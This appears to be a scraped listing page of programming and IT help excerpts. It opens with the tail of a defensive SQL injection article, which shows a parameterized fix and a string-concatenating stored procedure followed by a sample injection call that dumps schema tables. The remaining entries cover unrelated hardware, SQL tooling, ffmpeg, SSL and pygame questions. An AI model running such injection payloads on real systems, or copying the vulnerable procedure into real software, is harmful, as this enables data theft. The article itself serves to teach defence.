and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

  Read the article

• How do I replace the screen of a Dell Ispiron 1545?

  - by Ajus10

  I got a new screen for a Dell Inspiron 1545. The old screen says Dell Inspiron 1545 LP156WH1 (TL)(C1?) HD and the new one says Dell Inspiron 1545 LP156WH1 (TL)(C1?) LCD Does that make a difference? All I can get to work on the new screen is the backlight. The old screen had a crack. Now when I plug the old one in, it will not turn on at all. Could I have blown the inverter or messed up the cable?

  Read the article

• Extreme Optimization – Curves (Function Mapping) Part 1

  - by JoshReuben

  Overview ·        a curve is a functional map relationship between two factors (i.e. a function - However, the word function is a reserved word). ·        You can use the EO API to create common types of functions, find zeroes and calculate derivatives - currently supports constants, lines, quadratic curves, polynomials and Chebyshev approximations. ·        A function basis is a set of functions that can be combined to form a particular class of functions.   The Curve class ·        the abstract base class from which all other curve classes are derived – it provides the following methods: ·        ValueAt(Double) - evaluates the curve at a specific point. ·        SlopeAt(Double) - evaluates the derivative ·        Integral(Double, Double) - evaluates the definite integral over a specified interval. ·        TangentAt(Double) - returns a Line curve that is the tangent to the curve at a specific point. ·        FindRoots() - attempts to find all the roots or zeroes of the curve. ·        A particular type of curve is defined by a Parameters property, of type ParameterCollection   The GeneralCurve class ·        defines a curve whose value and, optionally, derivative and integrals, are calculated using arbitrary methods. A general curve has no parameters. ·        Constructor params:  RealFunction delegates – 1 for the function, and optionally another 2 for the derivative and integral ·        If no derivative  or integral function is supplied, they are calculated via the NumericalDifferentiation  and AdaptiveIntegrator classes in the Extreme.Mathematics.Calculus namespace. // the function is 1/(1+x^2) private double f(double x) {     return 1 / (1 + x*x); }   // Its derivative is -2x/(1+x^2)^2 private double df(double x) {     double y = 1 + x*x;     return -2*x* / (y*y); }   // The integral of f is Arctan(x), which is available from the Math class. var c1 = new GeneralCurve (new RealFunction(f), new RealFunction(df), new RealFunction(System.Math.Atan)); // Find the tangent to this curve at x=1 (the Line class is derived from Curve) Line l1 = c1.TangentAt(1);

  Read the article

• Smart defaults [SSDT]

  - by jamiet

  I’ve just discovered a new, somewhat hidden, feature in SSDT that I didn’t know about and figured it would be worth highlighting here because I’ll bet not many others know it either; the feature is called Smart Defaults. It gets around the problem of adding a NOT NULLable column to an existing table that has got data in it – previous to SSDT you would need to define a DEFAULT constraint however it does feel rather cumbersome to create an object purely for the purpose of pushing through a deployment – that’s the situation that Smart Defaults is meant to alleviate. The Smart Defaults option exists in the advanced section of a Publish Profile file: The description of the setting is “Automatically provides a default value when updating a table that contains data with a column that does not allow null values”, in other words checking that option will cause SSDT to insert an arbitrary default value into your newly created NON NULLable column. In case you’re wondering how it does it, here’s how: SSDT creates a DEFAULT CONSTRAINT at the same time as the column is created and then immediately removes that constraint: ALTER TABLE [dbo].[T1]    ADD [C1] INT NOT NULL,         CONSTRAINT [SD_T1_1df7a5f76cf44bb593506d05ff9a1e2b] DEFAULT 0 FOR [C1];ALTER TABLE [dbo].[T1] DROP CONSTRAINT [SD_T1_1df7a5f76cf44bb593506d05ff9a1e2b]; You can then update the value as appropriate in a Post-Deployment script. Pretty cool! On the downside, you can only specify this option for the whole project, not for an individual table or even an individual column – I’m not sure that I’d want to turn this on for an entire project as it could hide problems that a failed deployment would highlight, in other words smart defaults could be seen to be “papering over the cracks”. If you think that should be improved go and vote (and leave a comment) at [SSDT] Allow us to specify Smart defaults per table or even per column. @Jamiet

  Read the article

• Smart defaults [SSDT]

  - by jamiet

  I’ve just discovered a new, somewhat hidden, feature in SSDT that I didn’t know about and figured it would be worth highlighting here because I’ll bet not many others know it either; the feature is called Smart Defaults. It gets around the problem of adding a NOT NULLable column to an existing table that has got data in it – previous to SSDT you would need to define a DEFAULT constraint however it does feel rather cumbersome to create an object purely for the purpose of pushing through a deployment – that’s the situation that Smart Defaults is meant to alleviate. The Smart Defaults option exists in the advanced section of a Publish Profile file: The description of the setting is “Automatically provides a default value when updating a table that contains data with a column that does not allow null values”, in other words checking that option will cause SSDT to insert an arbitrary default value into your newly created NON NULLable column. In case you’re wondering how it does it, here’s how: SSDT creates a DEFAULT CONSTRAINT at the same time as the column is created and then immediately removes that constraint: ALTER TABLE [dbo].[T1]    ADD [C1] INT NOT NULL,         CONSTRAINT [SD_T1_1df7a5f76cf44bb593506d05ff9a1e2b] DEFAULT 0 FOR [C1];ALTER TABLE [dbo].[T1] DROP CONSTRAINT [SD_T1_1df7a5f76cf44bb593506d05ff9a1e2b]; You can then update the value as appropriate in a Post-Deployment script. Pretty cool! On the downside, you can only specify this option for the whole project, not for an individual table or even an individual column – I’m not sure that I’d want to turn this on for an entire project as it could hide problems that a failed deployment would highlight, in other words smart defaults could be seen to be “papering over the cracks”. If you think that should be improved go and vote (and leave a comment) at [SSDT] Allow us to specify Smart defaults per table or even per column. @Jamiet

  Read the article

• Diamond-square terrain generation problem

  - by kafka

  I've implemented a diamond-square algorithm according to this article: http://www.lighthouse3d.com/opengl/terrain/index.php?mpd2 The problem is that I get these steep cliffs all over the map. It happens on the edges, when the terrain is recursively subdivided: Here is the source: void DiamondSquare(unsigned x1,unsigned y1,unsigned x2,unsigned y2,float range) { int c1 = (int)x2 - (int)x1; int c2 = (int)y2 - (int)y1; unsigned hx = (x2 - x1)/2; unsigned hy = (y2 - y1)/2; if((c1 <= 1) || (c2 <= 1)) return; // Diamond stage float a = m_heightmap[x1][y1]; float b = m_heightmap[x2][y1]; float c = m_heightmap[x1][y2]; float d = m_heightmap[x2][y2]; float e = (a+b+c+d) / 4 + GetRnd() * range; m_heightmap[x1 + hx][y1 + hy] = e; // Square stage float f = (a + c + e + e) / 4 + GetRnd() * range; m_heightmap[x1][y1+hy] = f; float g = (a + b + e + e) / 4 + GetRnd() * range; m_heightmap[x1+hx][y1] = g; float h = (b + d + e + e) / 4 + GetRnd() * range; m_heightmap[x2][y1+hy] = h; float i = (c + d + e + e) / 4 + GetRnd() * range; m_heightmap[x1+hx][y2] = i; DiamondSquare(x1, y1, x1+hx, y1+hy, range / 2.0); // Upper left DiamondSquare(x1+hx, y1, x2, y1+hy, range / 2.0); // Upper right DiamondSquare(x1, y1+hy, x1+hx, y2, range / 2.0); // Lower left DiamondSquare(x1+hx, y1+hy, x2, y2, range / 2.0); // Lower right } Parameters: (x1,y1),(x2,y2) - coordinates that define a region on a heightmap (default (0,0)(128,128)). range - basically max. height. (default 32) Help would be greatly appreciated.

  Read the article

• How do I replace the screen of a Dell Inspiron 1545?

  - by Ajus10

  I got a new screen for a Dell Inspiron 1545. The old screen says Dell Inspiron 1545 LP156WH1 (TL)(C1?) HD and the new one says Dell Inspiron 1545 LP156WH1 (TL)(C1?) LCD Does that make a difference? All I can get to work on the new screen is the backlight. The old screen had a crack. Now when I plug the old one in, it will not turn on at all. Could I have blown the inverter or messed up the cable?

  Read the article

• SSL connection error during handshake on Windows Server 2008 R2

  - by Thomas

  I have a Windows 2008 R2 Server that runs a HTTPS Tunneling service. The software uses a certificate that is provided via the Windows certificate store. The certificate is located in the local computer private certificates. It supports server and client authentication with signing and keyencipherment. Cert chain The certificate chain looks fine. It's a Thawte SSL123 certificate. Thawte Premium Server CA (SHA1) [?e0 ab 05 94 20 72 54 93 05 60 62 02 36 70 f7 cd 2e fc 66 66] thawte Primary Root CA [?1f a4 90 d1 d4 95 79 42 cd 23 54 5f 6e 82 3d 00 00 79 6e a2] Thawte DV SSL CA [3c a9 58 f3 e7 d6 83 7e 1c 1a cf 8b 0f 6a 2e 6d 48 7d 67 62] Server certificate Issues Most browsers accept the certificate without any warning. But IE 7 on Windows XP SP3 and Opera 12 on OSX just report an connection error. Opera complains: Secure connection: fatal error (552) https://www.example.com/ Opera was not able to connect to the server, because the server does not communicate via any secure protocol known to Opera. A connection test using openssl s_client -connect www.example.com:443 -state says: CONNECTED(00000003) SSL_connect:before/connect initialization SSL_connect:SSLv2/v3 write client hello A 52471:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure:/SourceCache/OpenSSL098/OpenSSL098-35.1/src/ssl/s23_lib.c:182: ssldump -aAHd host www.example.com during curl https://www.example.com/ reports: New TCP connection #1: localhost(53302) <-> www.example.com(443) 1 1 0.0235 (0.0235) C>SV3.1(117) Handshake ClientHello Version 3.1 random[32]= 50 77 56 29 e8 23 82 3b 7f e0 ae 2d c1 31 cb ac 38 01 31 85 4f 91 39 c1 04 32 a6 68 25 cd a0 c1 cipher suites Unknown value 0x39 Unknown value 0x38 Unknown value 0x35 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA TLS_RSA_WITH_3DES_EDE_CBC_SHA Unknown value 0x33 Unknown value 0x32 Unknown value 0x2f Unknown value 0x9a Unknown value 0x99 Unknown value 0x96 TLS_RSA_WITH_RC4_128_SHA TLS_RSA_WITH_RC4_128_MD5 TLS_DHE_RSA_WITH_DES_CBC_SHA TLS_DHE_DSS_WITH_DES_CBC_SHA TLS_RSA_WITH_DES_CBC_SHA TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA TLS_RSA_EXPORT_WITH_DES40_CBC_SHA TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 TLS_RSA_EXPORT_WITH_RC4_40_MD5 Unknown value 0xff compression methods unknown value NULL 1 0.0479 (0.0243) S>C TCP FIN 1 0.0481 (0.0002) C>S TCP FIN Thawte provides two Java based SSL Checkers. The Legacy Thawte SSL Certificate Installation Checker and the sslToolBox. Both validate the certificate under Windows XP but report connection errors under OSX and Windows 2008 R2.

  Read the article

• Cannot Connect Modem ( /dev/ttySL0 ) Using gnome-ppp - Dial-Up Connection

  - by nicorellius

  I'm trying to connect my Toshiba Satellite running Ubuntu 10.04 to my Eris running Android 2.1 through a Bluetooth connection and establish a dial-up connection (DUN) with the modem. I can connect my phone to my laptop, and I can detect my modem (after installing drivers), which is located at /dev/ttySL0. But when I launch gnome-ppp and enter my phone number (123 for PDA-Net) I get a dialog that says "Connecting... Sending Password" with Log and Cancel buttons. The log shows this: --> WvDial: Internet dialer version 1.60 --> Cannot get information for serial port. --> Initializing modem. --> Sending: ATZ ATZ OK --> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 OK --> Modem initialized. --> Please enter password (or empty password to stop): --> Configuration does not specify a valid login name. The PDA-Net DUN protocol is running and shows no error. Any ideas? Any help is much appreciated.

  Read the article

• merging video and audio with custom panning

  - by cherouvim

  I have: a video which has mono audio inside a audio (mono) I'd like to merge those two to a single video file containing: video from #1 audio from #1 full left pan + audio #2 full right pan Is this possible in ffmpeg using 1 command? I've tried the following which almost does this but the video/audio gets out of sync: ffmpeg -i video.mp4 -filter_complex "amovie=audio.wav [r] ; [r] amerge" output.mp4 -y I've managed to do it with multiple commands: #1 create right panned audio ffmpeg -i audio.wav -ac 2 -vbr 5 audio-stereo.mp3 -y ffmpeg -i audio-stereo.mp3 -af pan=stereo:c1=c1 audio-right.mp3 -y #2 create left panned video ffmpeg -i video.mp4 -af pan=stereo:c0=c0 video-left.mp4 -y #3 merge the two ffmpeg -i video-left.mp4 -i audio-right.mp3 -filter_complex "amix=inputs=2" video-mixed.mp4 -y It does the job, but is it possible with 1 command?

  Read the article

• How to know which revision or router I do have?

  - by Rosamunda

  I´m trying to update my D-link Dir-600 router with the dd-wrt firmware. I´ve searched for it at the site and found that: Revision A1, B1 and B2 are supported, while C isn´t. Now my router has this information on the back: P/N IIR600GNA .... C1G H/W Ver: C1 F/W Ver: 3.01 So I guess the H/W Ver is the revision, and it´s C... so it´s a lost cause? Or maybe because it´s not just C but C1 I could do something with it? Thanks!

  Read the article

• Did bittorrent sync take advantage of multiple peers

  - by NachoChip

  I am currently testing BT sync, and really like it. However, I cannot find much of the technical detail regarding to how it works. I wonder did anyone know that is the program take advantage of multiple peers connection? For example, if I have a File A(FA), which exist in Computer 1 (C1) and Computer 2 (C2). If I set up a sync from C1 and C2 to a folder in Computer 3 (C3), will I get a better sync up time because I can get FA from 2 sources at the same time (of course, assume I have enough downstream)?

  Read the article

• Splitting Pygame functionality between classes or modules?

  - by sec_goat

  I am attempting to make my pygame application more modular so that different functionalities are split up into different classes and modules. I am having some trouble getting pygame to allow me to draw or load images in secondary classes when the display has been set and pygame.init() has been done in my main class. I have typically used C# and XNA to accomplish this sort of behavior, but this time I need to use python. How do I init pygame in class1, then create an instance of class2 which loads and converts() images. I have tried pygame.init() in class 2 but then it tells me no display mode has been set, when it has been set in class1. I am under the impression i do not wnat to create multiple pygame.displays as that gets problematic I am probably missing something pythonic and simple but I am not sure what. How do I create a Display class, init python and then have other modules do my work like loading images, fonts etc.? here is the simplest version of what I am doing: class1: def __init__(self): self.screen = pygame.display.set_mode((600,400)) self.imageLoader = class2() class2: def __init__(self): self.images = ['list of images'] def load_images(): self.images = os.listdir('./images/') #get all images in the images directory for img in self.images: #read all images in the directory and load them into pygame new_img = pygame.image.load(os.path.join('images', img)).convert() scale_img = pygame.transform.scale(new_img, (pygame.display.Info().current_w, pygame.display.Info().current_h)) self.images.append(scale_img) if __name__ == "__main__": c1 = class1() c1.imageLoader.load_images() Of course when it tries to load an convert the images it tells me pygame has not been initialized, so i throw in a pygame.init() in class2 ( i have heard it is safe to init multiple times) and then the error goes to pygame.error: No video mode has been set

  Read the article

• Visual Studio 2010 tool to order members inside #region

  - by Michael Swan

  There exist a tool for Visual studio which order alphabetically the members grouped by #region ? means #region A1() ... A2() ... A0() ... B1() ... Z1() ... B5() ... #endregion #region C1() ... C2() ... C0() ... D1() ... X1() ... Y5() ... #endregion With that tool, I want like: #region A0() ... A1() ... A2() ... B1() ... B5() ... Z1() ... #endregion #region C0() ... C1() ... C2() ... D1() ... X1() ... Y5() ... #endregion Thank you

  Read the article

< Previous Page | 4 5 6 7 8 9 10 11 12 13 14 15  | Next Page >